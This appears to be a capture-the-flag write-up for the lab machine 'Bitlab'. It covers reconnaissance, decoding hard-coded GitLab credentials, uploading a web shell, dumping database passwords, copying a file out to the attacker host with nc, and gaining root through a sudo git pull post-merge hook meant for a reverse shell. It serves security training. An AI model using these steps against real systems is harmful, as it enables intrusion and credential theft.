Today, we’re going to solve another CTF machine ” Bitlab “. It is now retired box and can be accessible to VIP member.
Specifications
• Target OS: Linux
• Services: SSH, HTTP
• IP Address: 10.10.10.114
• Difficulty: Medium
Contents
• Getting user
• Getting root
Reconnaissance
As always, the first step consists of reconnaissance phase as port scanning.
Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
nmap -sC -sV -oA 10.10.10.114
Enumerating Port 80
If we browse URL http://10.10.10.114 there’s an gitlab software installed.
We’re gonna do some manual reconnaissance first. Robots.txt file reveled lot of directories which are disallowed for search engines.
http://10.10.10.114/robots.txt
Now, we’re gonna check those directories one by one to see if we can find something interesting for us.
If we go to http://10.10.10.114/help we could find bookmarks.html file by checking that we found HEX code.
There’s and binary hex encoded on href Gitlab Login.
We found encoded hex binary let’s decode it.
Or use http://ddecode.com/hexdecoder
Or you can use python to decode it.
>>> code = ["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"] >>> for decode in code : ... print(decode) ... value user_login getElementById clave user_password 11des0081x >>>
Values are decoded and we got clave username and password. Using those credentials on gitlab we successfully logged-in to gitlab page.
There’s two projects, Deployer & Profile.
Profile Project
There’s also an code snippet.
Which revels postgresql database credentials.
Exploitation
Foothold
We got two projects and by browsing http://10.10.10.114/profile
The code is similar to what we found on gitlab. Let’s do some changes to verify we can merge the code.
Go to > project and click on New Branch.
Name anything and click on Create Branch.
Now, click on Upload file and upload your shell.
Now, if you remember we had a code snippet on our gitlab let’s check it out now.
So, we had to do this.
[email protected]:/var/www/html/profile$ php -a php > $connection = new PDO('pgsql:host=localhost;dbname=profiles', 'profiles', 'profiles'); php > $result = $connection->query("SELECT * FROM profiles"); php > $profiles = $result->fetchAll(); php > print_r($profiles); Array ( [0] => Array ( [id] => 1 [0] => 1 [username] => clave [1] => clave [password] => c3NoLXN0cjBuZy1wQHNz== [2] => c3NoLXN0cjBuZy1wQHNz== ) )
We got a base64 encoded password string.
Password: [email protected]
However, the base64 is an actual password for clave ssh login.Password: c3NoLXN0cjBuZy1wQHNz==
User owned!
Privilege Escalation
Method #1
In the home directory of clave there’s an Windows exe file named: RemoteConnection.exe
Isn’t it odd to have a windows executable file in linux server? Let’s download it into our server and do some reversing.
To download file we can use SSH or Ncat.
Using SSH
scp [email protected]:/home/clave/RemoteConnection.exe .
Using Ncat
On Victim Machine
[email protected]:~$ nc -w 3 10.10.14.12 4444 < RemoteConnection.exe
On Targeted Machine
nc -lvp 4444 > RemoteConnection.exe
After downloading debug the exe file into immunity debugger.
Method #2
If you do sudo -l you’ll get NOPASSWD at git pull.
Let’s exploit this to get root. We’re gonna run these commands.
[email protected]:/$ cd /tmp [email protected]:/tmp/m4ster$ cp -rf /var/www/html/profile . [email protected]:/tmp/m4ster$ cd profile [email protected]:/tmp/m4ster/profile$
After copying is done we’re gonna create a hook and post-merge. Let’s create a post-merge file.
touch post-merge
stty rows 29 columns 147
After creating post-merge inside /tmp/profiles/.git/hooks/ we’re going to put our reverse shell there.
